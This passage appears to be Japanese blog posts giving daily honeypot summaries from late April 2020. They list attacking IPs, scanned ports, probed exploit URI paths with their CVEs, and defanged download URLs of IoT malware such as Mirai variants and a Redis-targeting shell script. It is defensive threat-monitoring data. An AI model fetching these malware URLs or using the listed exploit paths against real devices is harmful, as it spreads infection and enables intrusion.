112[.]95[.]173[.]173 China 78 件 Link
111[.]202[.]166[.]17 China 59 件 Link
113[.]6[.]252[.]219 China 41 件 Link
200[.]219[.]199[.]188 Brazil 18 件 Link
185[.]234[.]219[.]85 Poland 6 件 Link
115[.]23[.]172[.]118 South Korea 3 件 Link
198[.]108[.]67[.]48 United States 3 件 Link
221[.]229[.]174[.]149 China 2 件 Link
196[.]189[.]130[.]14 Ethiopia 2 件 Link
182[.]120[.]80[.]42 China 2 件 Link
60[.]162[.]23[.]222 China 2 件 Link
61[.]148[.]238[.]4 China 1 件 Link
112[.]25[.]69[.]55 China 1 件 Link
114[.]97[.]230[.]63 China 1 件 Link
101[.]234[.]76[.]77 China 1 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/28)

マルウェア欄の内容を少しアップデートしてみました。 IoT系を狙ったものは相変わらず多いですが、Redisの狙ったマルウェアダウンロードもは増加していました。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 81291 件
22 The Secure Shell (SSH) Protocol 4215 件
445 Microsoft-DS 1749 件
3389 MS WBT Server 149 件
2404 IEC 60870-5-104 process control over IP 96 件
1030 Unknown 80 件
7657 Unknown 78 件
139 NETBIOS Session Service 73 件
110 Post Office Protocol - Version 3 66 件
5007 wsm server ssl 57 件
81 Unknown 56 件
8080 HTTP Alternate (see port 80) 54 件
9527 Unknown 49 件
631 IPP (Internet Printing Protocol)Internet Printing Protocol over HTTPS 44 件
52869 Realtek SDK miniigd SOAP Service 43 件
8088 Radan HTTP 43 件
18245 Unknown 42 件
2087 ELI - Event Logging Integration 40 件
5901 Unknown 40 件
3780 Nuzzler Network Protocol 40 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
45[.]239[.]183[.]129 Brazil 37943 件 Link
222[.]90[.]212[.]62 China 24539 件 Link
185[.]202[.]1[.]19 France 10789 件 Link
125[.]161[.]80[.]47 Indonesia 4642 件 Link
58[.]56[.]40[.]222 China 3096 件 Link
119[.]52[.]233[.]227 China 3090 件 Link
220[.]179[.]82[.]19 China 3085 件 Link
183[.]151[.]77[.]61 China 3077 件 Link
198[.]245[.]50[.]167 Canada 2355 件 Link
185[.]158[.]113[.]43 Russia 2170 件 Link
31[.]206[.]1[.]5 Turkey 1161 件 Link
185[.]202[.]2[.]120 France 985 件 Link
185[.]202[.]1[.]85 France 907 件 Link
218[.]92[.]0[.]208 China 875 件 Link
49[.]88[.]112[.]70 China 462 件 Link
222[.]174[.]23[.]10 China 176 件 Link
185[.]202[.]2[.]197 France 130 件 Link
185[.]153[.]198[.]243 Russia 118 件 Link
198[.]108[.]67[.]48 United States 105 件 Link
123[.]130[.]124[.]77 China 102 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
202[.]53[.]8[.]129 India 9 件 Link
181[.]65[.]158[.]26 Peru 9 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
84[.]52[.]97[.]249 Russia 5 件 Link
195[.]176[.]3[.]23 Switzerland 4 件 Link
159[.]192[.]213[.]238 Thailand 2 件 Link
192[.]241[.]199[.]246 United States 1 件 Link
209[.]141[.]41[.]128 United States 1 件 Link
143[.]255[.]198[.]242 Brazil 1 件 Link
165[.]22[.]67[.]56 Germany 1 件 Link
68[.]183[.]181[.]44 Singapore 1 件 Link
185[.]232[.]65[.]211 Romania 1 件 Link
162[.]243[.]129[.]67 United States 1 件 Link
107[.]6[.]150[.]242 Netherlands 1 件 Link
115[.]163[.]75[.]164 Japan 1 件 Link
60[.]191[.]52[.]254 China 1 件 Link
185[.]188[.]239[.]23 Slovakia 1 件 Link
2[.]187[.]89[.]5 Iran 1 件 Link
176[.]216[.]226[.]149 Turkey 1 件 Link
185[.]173[.]35[.]21 Germany 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
202[.]53[.]8[.]129 India 9 件 Link
181[.]65[.]158[.]26 Peru 9 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
84[.]52[.]97[.]249 Russia 5 件 Link
195[.]176[.]3[.]23 Switzerland 4 件 Link
159[.]192[.]213[.]238 Thailand 2 件 Link
192[.]241[.]199[.]246 United States 1 件 Link
209[.]141[.]41[.]128 United States 1 件 Link
143[.]255[.]198[.]242 Brazil 1 件 Link
165[.]22[.]67[.]56 Germany 1 件 Link
68[.]183[.]181[.]44 Singapore 1 件 Link
185[.]232[.]65[.]211 Romania 1 件 Link
162[.]243[.]129[.]67 United States 1 件 Link
107[.]6[.]150[.]242 Netherlands 1 件 Link
115[.]163[.]75[.]164 Japan 1 件 Link
60[.]191[.]52[.]254 China 1 件 Link
185[.]188[.]239[.]23 Slovakia 1 件 Link
2[.]187[.]89[.]5 Iran 1 件 Link
176[.]216[.]226[.]149 Turkey 1 件 Link
185[.]173[.]35[.]21 Germany 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
- - - -

02 WOWHoneypot

URI Path Target CVE Memo
/news[.]php - - -
/axis2/services/Cat/exec Apache Axis2 - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
- - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 104517 件
/ - - 324 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 43 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 36 件
login[.]cgi D-Link Router - 36 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 19 件
sip:nm Session Initiation Protocol - 12 件
/nice - - 11 件
/robots[.]txt robots.txt - 9 件
/cgi CGI - 6 件
/version - - 6 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 5 件
/manager/html Apache Tomcat Manager - 5 件
/jmx JMX - 4 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 4 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 3 件
/home[.]asp ASP file - 3 件
/login[.]cgi D-Link Router - 3 件
/vpn/index[.]html - - 3 件
/cgi-bin/luci CGI - 3 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 3 件
/remote/login VPN Login - 3 件
/favicon[.]ico favicon - 3 件
/cgi-bin/webctrl[.]cgi CGI - 2 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 2 件
/server-info Apache - 2 件
/index[.]asp index - 2 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 2 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 2 件
/setup/eureka_info Google Home Hub - 2 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/jars Unknown - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/manager/text/list Apache Tomcat Manager - 1 件
/api/jsonws/invoke api - 1 件
hxxp://azenv[.]net/ Unauthorized relay - 1 件
/install[.]php php - 1 件
/_search Elasticsearch - 1 件
rtsp://160[.]16[.]145[.]183:10554/ Real Time Streaming Protocol - 1 件
/hudson Unknown - 1 件
/api api - 1 件
SERVER - - 1 件
/master-status Unknown - 1 件
/setup[.]cgi DGN1000 Netgear Router - 1 件
/info - - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
hxxp://chekfast[.]zennolab[.]com/proxy[.
]php
 Unauthorized relay - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 43 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 3 件
/home[.]asp ASP file - 2 件
/login[.]cgi D-Link Router - 2 件
/vpn/index[.]html - - 2 件
/cgi-bin/luci CGI - 2 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 2 件
/remote/login VPN Login - 2 件
/index[.]asp index - 2 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 2 件
/favicon[.]ico favicon - 2 件
/news[.]php New - 2 件
/portal/redlion Unknown - 1 件
/axis2/services/Cat/exec New - 1 件
/manager/html Apache Tomcat Manager - 1 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 1 件
/hudson Unknown - 1 件
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized relay - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/ - - 11 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/home[.]asp ASP file - 2 件
/login[.]cgi D-Link Router - 2 件
/vpn/index[.]html - - 2 件
/cgi-bin/luci CGI - 2 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 2 件
/remote/login VPN Login - 2 件
/index[.]asp index - 2 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 2 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/data[.]php - - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件
/index[.]php - - 1 件
/api/jsonws/invoke api - 1 件
/favicon[.]ico favicon - 1 件

Malware

  1. Honeytrap
Malware Localport RemoteIP URI Path Count
hxxp://51[.]178[.]81[.]75/pandora[.]mips 52869 142[.]44[.]211[.]179 /picsdesc[.]xml 8 件
hxxp://45[.]95[.]168[.]127/bins/911[.]mips 52869 107[.]175[.]189[.]180 /picsdesc[.]xml 2 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 124[.]235[.]118[.]14 No uri path 2 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 124[.]235[.]118[.]14 No uri path 2 件
hxxp://178[.]33[.]64[.]107/arm7 8089 12[.]118[.]196[.]134 /cgi 1 件
hxxp://178[.]33[.]64[.]107/arm7 9673 187[.]190[.]221[.]119 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件
hxxp://192[.]3[.]45[.]185/arm7 8089 121[.]32[.]151[.]178 /cgi 1 件
hxxp://176[.]123[.]3[.]96/arm7 8089 104[.]220[.]194[.]92 /cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 112[.]90[.]197[.]66 No uri path 1 件
hxxp://178[.]33[.]64[.]107/arm7 9673 184[.]82[.]152[.]213 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件
hxxp://212[.]114[.]52[.]128/arm7 9673 77[.]242[.]22[.]60 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件
hxxp://212[.]114[.]52[.]128/arm7 9673 181[.]57[.]186[.]230 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件
hxxp://178[.]33[.]64[.]107/arm7 8089 96[.]86[.]248[.]165 /cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 113[.]214[.]30[.]171 No uri path 1 件
hxxp://45[.]95[.]168[.]254:1691/c 5555 45[.]95[.]168[.]254 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 113[.]214[.]30[.]171 No uri path 1 件
hxxp://178[.]33[.]64[.]107/arm7 8089 99[.]230[.]166[.]85 /cgi 1 件
hxxp://176[.]123[.]3[.]96/arm7 8089 24[.]85[.]221[.]115 /cgi 1 件
hxxp://192[.]168[.]1[.]1:8088/Mozi[.]m 8080 91[.]234[.]62[.]21 /setup[.]cgi 1 件
hxxp://178[.]33[.]64[.]107/arm7 9673 74[.]102[.]39[.]43 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件
hxxp://185[.]172[.]110[.]224/wget 5555 80[.]82[.]78[.]104 No uri path 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 95[.]47[.]248[.]84 Ukraine 78 件 Link
110 185[.]202[.]2[.]197 France 65 件 Link
139 185[.]202[.]2[.]197 France 65 件 Link
3389 212[.]32[.]230[.]44 Netherlands 8 件 Link
3389 222[.]174[.]105[.]82 China 6 件 Link
17887 185[.]202[.]1[.]19 France 4 件 Link
19299 185[.]202[.]1[.]19 France 4 件 Link
17700 185[.]202[.]1[.]19 France 4 件 Link
18292 185[.]202[.]1[.]19 France 4 件 Link
18544 185[.]202[.]1[.]19 France 4 件 Link
19918 185[.]202[.]1[.]19 France 4 件 Link
18306 185[.]202[.]1[.]19 France 4 件 Link
16794 185[.]202[.]1[.]19 France 4 件 Link
18531 185[.]202[.]1[.]19 France 4 件 Link
25175 185[.]202[.]1[.]19 France 4 件 Link
3389 193[.]169[.]252[.]136 Poland 4 件 Link
23932 185[.]202[.]1[.]19 France 4 件 Link
24637 185[.]202[.]1[.]19 France 4 件 Link
24698 185[.]202[.]1[.]19 France 4 件 Link
24171 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
3389 139 件
110 66 件
139 65 件
3390 15 件
3388 14 件
3391 12 件
3395 8 件
33389 7 件
3392 7 件
19999 6 件
3393 6 件
25353 6 件
18566 6 件
17330 6 件
3387 5 件
3380 5 件
17093 5 件
19101 5 件
24008 5 件
18171 5 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 10789 件 Link
185[.]158[.]113[.]43 Russia 2170 件 Link
185[.]202[.]2[.]120 France 985 件 Link
185[.]202[.]1[.]85 France 907 件 Link
185[.]202[.]2[.]197 France 130 件 Link
185[.]153[.]198[.]243 Russia 118 件 Link
185[.]153[.]199[.]87 Russia 91 件 Link
92[.]63[.]194[.]241 Russia 90 件 Link
185[.]153[.]196[.]239 Russia 88 件 Link
185[.]153[.]199[.]81 Russia 84 件 Link
95[.]47[.]248[.]84 Ukraine 78 件 Link
92[.]63[.]194[.]21 Russia 77 件 Link
5[.]101[.]64[.]77 Russia 76 件 Link
185[.]202[.]2[.]149 France 51 件 Link
185[.]153[.]199[.]12 Russia 51 件 Link
195[.]54[.]167[.]225 Russia 32 件 Link
185[.]153[.]196[.]99 Russia 25 件 Link
185[.]202[.]2[.]9 France 22 件 Link
87[.]251[.]75[.]254 Russia 20 件 Link
185[.]202[.]0[.]27 United Kingdom 15 件 Link

Port 1433

IP Country Count AbuseIPDB
45[.]239[.]183[.]129 Brazil 37943 件 Link
222[.]90[.]212[.]62 China 24539 件 Link
125[.]161[.]80[.]47 Indonesia 4642 件 Link
58[.]56[.]40[.]222 China 3096 件 Link
119[.]52[.]233[.]227 China 3090 件 Link
220[.]179[.]82[.]19 China 3085 件 Link
183[.]151[.]77[.]61 China 3077 件 Link
31[.]206[.]1[.]5 Turkey 1161 件 Link
222[.]174[.]23[.]10 China 175 件 Link
123[.]130[.]124[.]77 China 102 件 Link
103[.]193[.]149[.]4 China 94 件 Link
61[.]178[.]152[.]19 China 88 件 Link
58[.]249[.]54[.]170 China 86 件 Link
121[.]31[.]15[.]22 China 33 件 Link
85[.]95[.]191[.]36 Russia 12 件 Link
194[.]28[.]65[.]137 Ukraine 12 件 Link
27[.]155[.]87[.]173 China 3 件 Link
41[.]189[.]166[.]19 Ghana 2 件 Link
45[.]239[.]100[.]41 Brazil 2 件 Link
180[.]242[.]97[.]97 Indonesia 2 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/27)

Mirai系の亜種 pandora.mips を検知していました。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 150105 件
22 The Secure Shell (SSH) Protocol 3449 件
445 Microsoft-DS 1691 件
8022 oa-system 347 件
3389 MS WBT Server 109 件
1065 SYSCOMLAN 92 件
2404 IEC 60870-5-104 process control over IP 82 件
81 Unknown 74 件
26 Unassigned 64 件
8080 HTTP Alternate (see port 80) 55 件
52869 Realtek SDK miniigd SOAP Service 54 件
3388 CB Server 48 件
8081 Sun Proxy Admin Service 47 件
3050 gds_db 47 件
5101 Talarian_TCP 39 件
2107 BinTec Admin 38 件
20022 Unknown 32 件
119 Network News Transfer Protocol 29 件
139 NETBIOS Session Service 28 件
8031 Unknown 25 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
58[.]58[.]226[.]122 China 40632 件 Link
109[.]248[.]66[.]112 Russia 29059 件 Link
122[.]224[.]210[.]146 China 14094 件 Link
185[.]202[.]1[.]19 France 11818 件 Link
119[.]98[.]179[.]18 China 8983 件 Link
61[.]140[.]196[.]62 China 7541 件 Link
119[.]1[.]160[.]39 China 6938 件 Link
116[.]21[.]158[.]188 China 4922 件 Link
59[.]174[.]98[.]144 China 4588 件 Link
185[.]202[.]1[.]189 France 3232 件 Link
5[.]252[.]193[.]112 Russia 3125 件 Link
185[.]202[.]1[.]217 France 3122 件 Link
95[.]134[.]189[.]18 Ukraine 3023 件 Link
111[.]253[.]64[.]118 Taiwan 3020 件 Link
122[.]154[.]202[.]199 Thailand 3014 件 Link
201[.]63[.]34[.]90 Brazil 3001 件 Link
188[.]128[.]63[.]130 Russia 2999 件 Link
118[.]70[.]233[.]242 Vietnam 2998 件 Link
190[.]200[.]80[.]175 Venezuela 2988 件 Link
223[.]190[.]125[.]182 India 2947 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
218[.]29[.]111[.]116 China 16 件 Link
111[.]93[.]180[.]58 India 9 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
129[.]146[.]176[.]91 United States 6 件 Link
92[.]53[.]100[.]153 Russia 6 件 Link
91[.]144[.]147[.]145 Russia 3 件 Link
218[.]70[.]104[.]98 China 2 件 Link
187[.]171[.]119[.]229 Mexico 2 件 Link
188[.]158[.]91[.]240 Iran 2 件 Link
45[.]13[.]93[.]90 Germany 1 件 Link
139[.]162[.]119[.]197 Japan 1 件 Link
172[.]104[.]108[.]109 Japan 1 件 Link
93[.]91[.]152[.]150 Czechia 1 件 Link
51[.]146[.]34[.]248 United Kingdom 1 件 Link
216[.]48[.]59[.]137 United States 1 件 Link
87[.]254[.]35[.]90 Norway 1 件 Link
2[.]137[.]126[.]235 Spain 1 件 Link
78[.]189[.]18[.]153 Turkey 1 件 Link
74[.]59[.]34[.]102 Canada 1 件 Link
103[.]119[.]167[.]221 India 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
218[.]29[.]111[.]116 China 16 件 Link
111[.]93[.]180[.]58 India 9 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
129[.]146[.]176[.]91 United States 6 件 Link
92[.]53[.]100[.]153 Russia 6 件 Link
91[.]144[.]147[.]145 Russia 3 件 Link
218[.]70[.]104[.]98 China 2 件 Link
187[.]171[.]119[.]229 Mexico 2 件 Link
188[.]158[.]91[.]240 Iran 2 件 Link
45[.]13[.]93[.]90 Germany 1 件 Link
139[.]162[.]119[.]197 Japan 1 件 Link
172[.]104[.]108[.]109 Japan 1 件 Link
93[.]91[.]152[.]150 Czechia 1 件 Link
51[.]146[.]34[.]248 United Kingdom 1 件 Link
216[.]48[.]59[.]137 United States 1 件 Link
87[.]254[.]35[.]90 Norway 1 件 Link
2[.]137[.]126[.]235 Spain 1 件 Link
78[.]189[.]18[.]153 Turkey 1 件 Link
74[.]59[.]34[.]102 Canada 1 件 Link
103[.]119[.]167[.]221 India 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
- - - -

02 WOWHoneypot

URI Path Target CVE Memo
- - - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
- - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 183694 件
/ - - 330 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 54 件
login[.]cgi D-Link Router - 40 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 21 件
/index[.]action Apache Struts 2 CVE-2017-5638 20 件
/robots[.]txt robots.txt - 9 件
/version - - 8 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 8 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 8 件
sip:nm Session Initiation Protocol - 7 件
/home[.]asp ASP file - 6 件
/login[.]cgi D-Link Router - 6 件
/vpn/index[.]html - - 6 件
/cgi-bin/luci CGI - 6 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 6 件
/remote/login VPN Login - 6 件
/index[.]asp index - 6 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 6 件
/nice - - 6 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 4 件
/shell MVPower DVR - 4 件
/api api - 4 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 3 件
/cgi CGI - 3 件
/manager/text/list Apache Tomcat Manager - 3 件
SERVER - - 2 件
/server-info Apache - 2 件
/_ping Unknown - 2 件
/db/manage/ Database - 1 件
RTSP://160[.]16[.]145[.]183:554/ Real Time Streaming Protocol - 1 件
/setup/index[.]jsp Openfire Server 3.6.0a - 1 件
/_cat/indices Elasticsearch - 1 件
/_search Elasticsearch - 1 件
/jmx JMX - 1 件
/hudson Unknown - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
/solr/admin/info/system Apache Solr - 1 件
rtsp://160[.]16[.]145[.]183:8554/ Real Time Streaming Protocol - 1 件
/v1[.]16/version - - 1 件
/soap[.]cgi D-Link Devices - 1 件
/manager Apache Tomcat Manager - 1 件
/securityRealm/user/admin/search/index Administrator - 1 件
/v1[.]40/containers/json Docker Engine API - 1 件
/admin/connection/ Administrator - 1 件
/status - 2020/2/15 1 件
/info - - 1 件
[.][.]/[.][.]/proc/ proc directory - 1 件
/cgi-bin/webctrl[.]cgi CGI - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 34 件
/index[.]action Apache Struts 2 CVE-2017-5638 15 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 4 件
/cgi-bin/luci CGI - 3 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 3 件
/home[.]asp ASP file - 2 件
/login[.]cgi D-Link Router - 2 件
/vpn/index[.]html - - 2 件
/remote/login VPN Login - 2 件
/index[.]asp index - 2 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 2 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 1 件
/HNAP1/ Linksys Router D-Link Router 1 件
/ipc$ shared folder - 1 件
/hudson Unknown - 1 件
/manager/text/list Apache Tomcat Manager - 1 件
/boaform/admin/formPing Administrator - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/admin/assets/js/views/login[.]js FreePBX - 8 件
/ - - 6 件
/home[.]asp ASP file - 2 件
/login[.]cgi D-Link Router - 2 件
/vpn/index[.]html - - 2 件
/cgi-bin/luci CGI - 2 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 2 件
/remote/login VPN Login - 2 件
/index[.]asp index - 2 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 2 件
//a2billing/customer/templates/default/f
ooter[.]tpl
 FreePBX - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 184279 件
hxxp://51[.]255[.]170[.]237/pandora[.]mips 9 件
hxxp://178[.]33[.]64[.]107/arm7 5 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 4 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 2 件
hxxp://19ce033f[.]ngrok[.]io/arm7 2 件
hxxp://51[.]178[.]81[.]75/pandora[.]mips 2 件
hxxp://45[.]95[.]168[.]254:1691/dvrbot[.]arm7 1 件
hxxp://42[.]239[.]143[.]121:41631/Mozi[.]m 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 95[.]47[.]248[.]84 Ukraine 36 件 Link
3389 47[.]56[.]252[.]214 Hong Kong 12 件 Link
3389 220[.]242[.]7[.]46 China 6 件 Link
33022 185[.]202[.]2[.]120 France 5 件 Link
18941 185[.]202[.]1[.]19 France 4 件 Link
17945 185[.]202[.]1[.]19 France 4 件 Link
19057 185[.]202[.]1[.]19 France 4 件 Link
17058 185[.]202[.]1[.]19 France 4 件 Link
18421 185[.]202[.]1[.]19 France 4 件 Link
24577 185[.]202[.]1[.]19 France 4 件 Link
23190 185[.]202[.]1[.]19 France 4 件 Link
23996 185[.]202[.]1[.]19 France 4 件 Link
19433 185[.]202[.]1[.]19 France 4 件 Link
19541 185[.]202[.]1[.]19 France 4 件 Link
17451 185[.]202[.]1[.]19 France 4 件 Link
24379 185[.]202[.]1[.]19 France 4 件 Link
25473 185[.]202[.]1[.]19 France 4 件 Link
22854 185[.]202[.]1[.]19 France 4 件 Link
23641 185[.]202[.]1[.]19 France 4 件 Link
25334 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
3389 100 件
3388 10 件
3390 9 件
23390 7 件
18606 7 件
24997 7 件
17266 7 件
23389 7 件
3397 6 件
25048 6 件
24448 6 件
17533 6 件
34641 6 件
19032 6 件
34573 6 件
17180 6 件
17133 6 件
23903 6 件
33922 6 件
18910 6 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11818 件 Link
185[.]202[.]1[.]189 France 3232 件 Link
5[.]252[.]193[.]112 Russia 3125 件 Link
185[.]202[.]1[.]217 France 3122 件 Link
185[.]158[.]113[.]43 Russia 1912 件 Link
185[.]153[.]199[.]12 Russia 992 件 Link
185[.]202[.]2[.]120 France 982 件 Link
185[.]202[.]1[.]249 France 484 件 Link
185[.]202[.]1[.]10 France 373 件 Link
185[.]202[.]1[.]85 France 241 件 Link
5[.]101[.]64[.]77 Russia 175 件 Link
45[.]141[.]87[.]27 Russia 105 件 Link
185[.]153[.]196[.]99 Russia 45 件 Link
185[.]202[.]2[.]9 France 44 件 Link
95[.]47[.]248[.]84 Ukraine 36 件 Link
185[.]153[.]199[.]81 Russia 34 件 Link
195[.]54[.]167[.]225 Russia 32 件 Link
92[.]63[.]194[.]241 Russia 31 件 Link
41[.]216[.]186[.]89 St Kitts and Nevis 29 件 Link
185[.]153[.]199[.]87 Russia 26 件 Link

Port 1433

IP Country Count AbuseIPDB
58[.]58[.]226[.]122 China 40632 件 Link
109[.]248[.]66[.]112 Russia 29059 件 Link
122[.]224[.]210[.]146 China 14094 件 Link
119[.]98[.]179[.]18 China 8983 件 Link
61[.]140[.]196[.]62 China 7541 件 Link
119[.]1[.]160[.]39 China 6938 件 Link
116[.]21[.]158[.]188 China 4922 件 Link
59[.]174[.]98[.]144 China 4588 件 Link
95[.]134[.]189[.]18 Ukraine 3023 件 Link
111[.]253[.]64[.]118 Taiwan 3020 件 Link
122[.]154[.]202[.]199 Thailand 3014 件 Link
201[.]63[.]34[.]90 Brazil 3001 件 Link
188[.]128[.]63[.]130 Russia 2999 件 Link
118[.]70[.]233[.]242 Vietnam 2998 件 Link
190[.]200[.]80[.]175 Venezuela 2988 件 Link
223[.]190[.]125[.]182 India 2947 件 Link
36[.]66[.]240[.]58 Indonesia 1846 件 Link
42[.]113[.]153[.]132 Vietnam 1764 件 Link
45[.]239[.]183[.]129 Brazil 1574 件 Link
186[.]88[.]168[.]153 Venezuela 1158 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/26)

スイスからApache Tomcat Managerへのログイン試行を多数検知していました。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 128604 件
22 The Secure Shell (SSH) Protocol 7400 件
445 Microsoft-DS 1486 件
3389 MS WBT Server 235 件
1911 Starlight Networks Multimedia Transport Protocol 100 件
1110 Start web admin server 95 件
513 remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify "authentication domains" 92 件
28015 Unknown 88 件
1801 Microsoft Message Que 87 件
8080 HTTP Alternate (see port 80) 85 件
52869 Realtek SDK miniigd SOAP Service 69 件
106 3COM-TSMUX 68 件
6000 Unknown 54 件
81 Unknown 53 件
9222 QSC Team Coherence 51 件
18080 Unknown 41 件
8081 Sun Proxy Admin Service 39 件
28017 Unknown 39 件
7800 Apple Software Restore 39 件
18245 Unknown 37 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
58[.]58[.]226[.]122 China 49035 件 Link
45[.]141[.]87[.]27 Russia 36759 件 Link
111[.]246[.]2[.]73 Taiwan 13248 件 Link
109[.]248[.]66[.]112 Russia 13148 件 Link
185[.]202[.]1[.]19 France 11688 件 Link
198[.]245[.]50[.]167 Canada 5379 件 Link
185[.]202[.]1[.]217 France 3423 件 Link
114[.]41[.]215[.]58 Taiwan 3012 件 Link
103[.]62[.]233[.]18 Pakistan 3010 件 Link
175[.]114[.]50[.]74 South Korea 3007 件 Link
95[.]106[.]72[.]80 Russia 3007 件 Link
138[.]97[.]119[.]222 Brazil 3006 件 Link
67[.]69[.]26[.]93 Canada 3005 件 Link
42[.]114[.]248[.]207 Vietnam 3004 件 Link
160[.]20[.]109[.]159 Turkey 3003 件 Link
88[.]253[.]239[.]154 Turkey 3000 件 Link
201[.]24[.]82[.]11 Brazil 2999 件 Link
110[.]145[.]74[.]118 Australia 2999 件 Link
190[.]201[.]117[.]64 Venezuela 2999 件 Link
189[.]2[.]112[.]130 Brazil 2998 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
185[.]128[.]41[.]50 Switzerland 180 件 Link
